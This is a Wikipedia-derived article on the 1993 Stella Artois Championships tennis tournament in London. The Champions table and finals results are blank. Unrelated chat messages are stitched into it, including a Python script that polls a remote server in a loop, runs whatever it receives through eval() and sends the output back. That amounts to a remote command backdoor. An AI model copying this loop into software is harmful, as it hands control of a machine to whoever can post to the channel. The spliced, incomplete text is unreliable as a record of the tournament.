1993 Stella Artois Championships
The 1993 Stella Artois Championships was a men's tennis tournament played on grass courts at the Queen's Club in London in the United Kingdom and was part of the World Series of the 1993 ATP Tour. It was the 91st edition of the tournament ran from June 7 through June 14, 1993. Michael Stich won the singles title and Todd Woodbridge / Mark Woodforde won the doubles title.[1]
1993 Stella Artois Championships | |
---|---|
Date | June 7 – June 14 |
Edition | 91st |
Category | World Series |
Draw | 64S/32D |
Prize money | $600,000 |
Surface | Grass / Outdoor |
Location | London, England |
Venue | Queen's Club |
Champions | |
Singles | |
Doubles | |
Finals
Singles
- It was Stich's 3rd title of the year and the 18th of his career.
Doubles
- It was Woodbridge's 3rd title of the year and the 19th of his career. It was Woodforde's 4th title of the year and the 23rd of his career.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```Using the new SPUDNET-HTTP API.
gollark: Make it continuously ping osmarks.net so you know what it's up to.
gollark: Routers can do this.
gollark: Or give it a static IP, even?!
gollark: If it's on a LAN just... use the local IP?
References
External links
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.